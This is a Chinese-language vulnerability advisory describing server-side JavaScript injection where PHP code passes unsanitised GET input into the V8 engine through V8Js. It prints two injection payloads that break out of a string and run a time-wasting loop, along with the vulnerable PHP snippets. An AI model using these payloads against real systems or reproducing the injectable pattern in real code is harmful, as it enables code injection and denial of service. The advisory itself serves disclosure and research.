Google V8服务器端JavaScript注入漏洞

发布日期：2012-02-25
更新日期：2012-02-28受影响系统：
Google V8 JavaScript Engine
描述：
--------------------------------------------------------------------------------
Chromium是开源Web浏览器项目。V8是Google的开源JavaScript引擎。Google的V8服务器端引擎在实现上存在SSJS漏洞，攻击者通过PHP中的服务器端JavaScript注入漏洞导致注入任意代码。<*来源：Felipe Aragon （felipe@syhunt.com）

链接：http://packetstormsecurity.org/files/110210/Google-V8-Server-Side-Javascript-Injection.html
*>测试方法：
--------------------------------------------------------------------------------警告以下程序（方法）可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！vulnerable.php？msg=a";d%20=%20new%20Date（）;do{cd=new%20Date（）;}while（cd-d<10000）;foo="bar
Vulnerable Code:$msg = $_GET["msg"];
$v8 = new V8Js（）;
$v8->executeString（"var msg = "$msg"; ..SOME CODE.."）;
vulnerable.php？msg=version（））;d%20=%20new%20Date（）;do{cd=new%20Date（）;}while（cd-d<10000）;foo=（"bar"
Vulnerable Code:$msg = $_GET["msg"];
$v8 = new V8Js（）;
$JS = <<< EOT
len = print（$msg + "\n"）;
..SOME CODE..
EOT;$v8->executeString（$JS, "basic.js"）;建议：
--------------------------------------------------------------------------------
厂商补丁：Google
------
目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：http://www.google.comLinux Kernel "iproute"软件包多个不安全临时文件创建漏洞（CVE-2012-1088）OpenSSL ASN.1 S/MIME标头处理空指针引用拒绝服务漏洞相关资讯 Google

德国让Facebook、Google和Twitter （12/17/2015 17:13:52）
Google以色列Tel Aviv新总部实在是（02/06/2013 19:36:34）
传Google或与FTC达成专利和解协议（12/12/2012 09:03:38）

Google、亚马逊和微软付钱给（02/04/2015 07:43:00）
Google 开发者学院（中文版）正式上（12/14/2012 08:18:48）
Google 地图导航在中国大陆区域可（11/04/2012 07:44:32）

本文评论查看全部评论（0）

评论声明

尊重网上道德，遵守中华人民共和国的各项有关法律法规
承担一切因您的行为而直接或间接导致的民事或刑事法律责任
本站管理人员有权保留或删除其管辖留言中的任意内容
本站有权在网站内转载或引用您的评论